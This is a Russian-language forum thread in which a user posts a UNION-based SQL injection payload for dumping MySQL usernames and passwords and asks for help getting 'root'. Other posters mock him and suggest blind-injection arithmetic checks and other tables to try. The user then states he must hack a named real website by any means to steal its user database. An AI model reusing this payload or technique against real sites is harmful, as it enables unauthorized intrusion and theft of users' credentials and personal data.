люди помогите со sql ставлю типа -1+union+select+1,2,user,password,5,6+from+mysql.us er/*

а мне крен на ны а не рут пишет<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta http-equiv='Content-Type' content='text/html; charset=windows-1251'> <TITLE>Нет такой партии!</TITLE> </HEAD> <BODY bgcolor=white><CENTER> <H1>Недостаточно параметров</H1></CENTER> </BODY> </HTML>

подскажите как рута увести

мда... тут вроде телепатов нету!! и че ты имеш ввиду под root???? наверное админа получить??
полный урл дай

union походу фильтруется

union походу фильтруется
В так бы случае была бы синтаксическая ошибка!!
врятли бы оно писало

<H1>Недостаточно параметров</H1>

Сама иньекция у тебя что выводит там вообще при постоновки кавычки ошибки выводит??? если blind то попробуй 12 и 13-1 проверка на арифметические операчии которые поддерживает mysql

наверна парень хочеть типа такого чтоб было
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta http-equiv='Content-Type' content='text/html; charset=windows-1251'> <TITLE>Есть такой рут!</TITLE> </HEAD> <BODY bgcolor=white><CENTER> <H1>Нуу полный рууут</H1></CENTER> </BODY> </HTML> "

наверна парень хочеть типа такого чтоб было
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta http-equiv='Content-Type' content='text/html; charset=windows-1251'> <TITLE>Есть такой рут!</TITLE> </HEAD> <BODY bgcolor=white><CENTER> <H1>Нуу полный рууут</H1></CENTER> </BODY> </HTML> "


Зачем ты ему Дал html Exploit =)) Сейчас пойдёт и весь инет Взломает им...

satana8920 соблазни и уведи рута !)

ну нет у тебя доступа к mysql.user и не парься, ищи др. таблы ))

да мне любым способом надо ломануть сайт и увести базу данных юзеров вот и парюсь тут а время мало дали вот полная линка вот _http://www.kinnet.ru
может кто чего подскажет